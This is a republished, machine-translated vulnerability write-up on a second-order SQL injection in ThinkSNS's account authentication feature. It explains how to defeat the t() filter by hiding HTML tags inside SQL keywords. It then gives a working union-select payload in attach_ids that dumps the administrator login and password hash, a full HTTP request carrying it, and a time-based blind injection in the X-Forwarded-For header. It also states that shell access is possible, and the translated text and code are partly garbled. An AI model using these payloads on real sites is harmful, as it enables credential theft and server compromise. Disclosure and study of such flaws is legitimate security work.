ThinkSNS injects Bypass twice to prevent arbitrary data.

Source: Internet
Author: User

ThinkSNS injects Bypass twice to prevent arbitrary data.

ThinkSNS injects Bypass twice to prevent arbitrary data.

Part 1: Vulnerability Analysis

File/apps/public/Lib/Action/AccountAction. class. php
 

/*** Submit the application for authentication ** @ return void */public function doAuthenticate () {$ verifyInfo = D ('user _ verified ')-> where ('uid = '. $ this-> mid)-> find (); $ data ['usergroup _ id'] = intval ($ _ POST ['usergroup _ id']); if (! $ Data ['usergroup _ id']) $ data ['usergroup _ id'] = 5; $ data ['company'] = t ($ _ POST ['company']); $ data ['realname'] = t ($ _ POST ['realname']); $ data ['idcard'] = t ($ _ POST ['idcard']); $ data ['phone'] = t ($ _ POST ['phone']); $ data ['reason '] = t ($ _ POST ['reason']); // $ data ['info'] = t ($ _ POST ['info']); $ data ['Attach _ id'] = t ($ _ POST ['Attach _ id']); // attach_ids filter if (D ('user _ verified_category ')-> where ('pid = '. $ data ['usergroup _ id'])-> find () {$ data ['user _ verified_category_id '] = intval ($ _ POST ['verifiedcategory']);} else {$ data ['user _ verified_category_id '] = 0;} $ Regx1 ='/^ [0-9] * $ /'; $ Regx2 = '/^ [A-Za-z0-9] * $ /'; $ Regx3 = '/^ [A-Za-z | \ x {4e00}-\ x {9fa5}] + $/U ';...... preg_match_all ('/. /us ', $ data ['reason'], $ matchs); // a Chinese character is also a character if (count ($ matchs [0])> 140) {// $ this-> error ('authentication reason cannot exceed 140 characters'); echo 'authentication reason cannot exceed 140 characters'; exit ;} // preg_match_all ('/. /us', $ data ['info'], $ match); // a Chinese character is also a character // if (count ($ match [0])> 140) {// $ this-> error ('the authentication material cannot exceed 140 characters'); //} if ($ verifyInfo) {$ data ['verified '] = 0; $ res = D ('user _ verified ')-> where ('uid = '. $ verifyInfo ['uid'])-> save ($ data); // data enters the database} else {$ data ['uid'] = $ this-> mid; $ res = D ('user _ verified ')-> add ($ data);} if ($ res) {// echo '1'; model ('your y ') -> sendpolicy ($ this-> mid, 'public _ account_doAuthenticate '); $ touid = D ('user _ group_link')-> where ('user _ group_id = 1 ') -> field ('uid')-> findAll (); foreach ($ touid as $ k => $ v) {model ('regiony ') -> sendpolicy ($ v ['uid'], 'verify _ audit ');} // return $ this-> ajaxReturn (null, 'application successful, please wait for review ', 1); echo '1';} else {// $ this-> error ("application failed"); echo 'application failed'; exit ;}}



At this time, attach_ids has already entered the database.

Next let's take a look at the warehouse picking location
 

/*** Apply for authentication ** @ return void */public function authenticate () {$ auType = model ('usergroup')-> where ('is _ authenticate = 1 ') -> findall (); $ this-> assign ('autype ', $ auType); $ verifyInfo = D ('user _ verified')-> where ('uid = '. $ this-> mid)-> find (); if ($ verifyInfo ['Attach _ id']) {$ a = explode ('| ', $ verifyInfo ['Attach _ id']); foreach ($ a as $ key => $ val) {if ($ val! = "") {$ AttachInfo = D ('Attach ')-> where ("attach_id = $ a [$ key]")-> find (); // attach_id enter the database $ verifyInfo ['attachment']. = $ attachInfo ['name']. '& nbsp; <a href = "'. getImageUrl ($ attachInfo ['Save _ path']. $ attachInfo ['Save _ name']). '"target =" _ blank "> download </a> <br/> ';}}}



We can see that after the attach_id is taken out, it is split by | and then counted into the database again.

There is no quotation mark protection, resulting in SQL injection.

So as long as we insert malicious data in attach_id, it will be triggered twice.



Part 2: bypass Analysis

To see if the t function can bypass

/Core/OpenSociax/functions. inc. php
 

/*** T function is used to filter tags and output clean text without html * @ param string text content * @ return string processed content */function t ($ text) {$ text = nl2br ($ text); $ text = real_strip_tags ($ text); $ text = addslashes ($ text); $ text = trim ($ text ); return $ text ;}



Here is a real_strip_tags function.
 

function real_strip_tags($str, $allowable_tags="") {    $str = html_entity_decode($str,ENT_QUOTES,'UTF-8');    return strip_tags($str, $allowable_tags);}



Here, html is filtered out.

In summary, when a malicious SQL statement enters t, the html Tag is first filtered and then entered addslashes.

Then we can insert html tags in the SQL keyword to bypass global defense.

For example, select = se <a> lect, which bypasses the global structure and finally changes to select.

1. log on to the front-end and apply for authentication at the Personal Information Department.
 

http://localhost/thinksns/index.php?app=public&mod=Account&act=Authenticate



2. When submitting the file, capture the packet and change attach_ids:
 

attach_ids=%7C76%7C-1 un<a>ion se<a>lect 1,2,3,4,5,6,7,(se<a>lect co<a>ncat(login,0x23,password) fr<a>om ts_user li<a>mit 1),9,10,11,12,13,14,15,16,17,18,19,20#%7C



The request is as follows:
 

Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://localhost/thinksns/index.php?app=public&mod=Account&act=authenticateContent-Length: 156Cookie: CNZZDATA80862620=cnzz_eid%3D1277534265-1407229558-%26ntime%3D1411435759; bdshare_firstime=1407229707189; pgv_pvi=3674949632; cuz_auth=W25fXgRlUGYBbgdpB28EYFoyAmVSDgJnAg0CZgNjUT5VYQo7VzZXNFBmU2UBYQVhAj5SNFRiUTVXMAFkCGhUYFtpX2cENlBgATMHYgczBDVaNwIyUjcCYwI0Al8DMQ; cuz_userid=1; cuz_username=admin123; cej_username=admin123; cej_auth=fhtuNEBwVjcReA5jMQgdKnEVeklmPnVMWFpWYGMOA2RgBAJoVGReahoqJxI7Cg45R3dCcAw%2BX2dmDHVCVzooFH4cbg1AI1YxESUOaDFUHX9xEHoeZgd1SFhjVlljXA; cej_userid=1; PHPSESSID=2b74f139fdd6ec4d629fc2bce0a85e95; CNZZDATA1702264=cnzz_eid%3D2084647819-1413523648-http%253A%252F%252Flocalhost%252F%26ntime%3D1413523648; T3_online_update=1413552570; T3_TSV3_LOGGED_USER=fb8DZUmtTTQ17neIIPi6M7u8bJccMAEjX-Forwarded-For: 127.0.0.1',`email`=(if(mid(user(),1,1)=char(114),sleep(3),0))#Connection: keep-alivePragma: no-cacheCache-Control: no-cacheusergroup_id=&company=&realname=%E5%95%8A%E5%95%8A%E5%95%8A&idcard=111111111111111111&phone=13111111111&reason=111111&verifiedCategory=1&attach_ids=%7C76%7C-1 un<a>ion se<a>lect 1,2,3,4,5,6,7,(se<a>lect co<a>ncat(login,0x23,password) fr<a>om ts_user li<a>mit 1),9,10,11,12,13,14,15,16,17,18,19,20#%7C



3. Go Back To Step 1:

Access
 

http://localhost/thinksns/index.php?app=public&mod=Account&act=Authenticate



The Administrator account information is displayed in the authentication attachment:
 





Of course, if the conditions are met, GetShell is also OK.

Solution:

1. The condition following the where clause is protected

2. Rectification and defense Logic

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.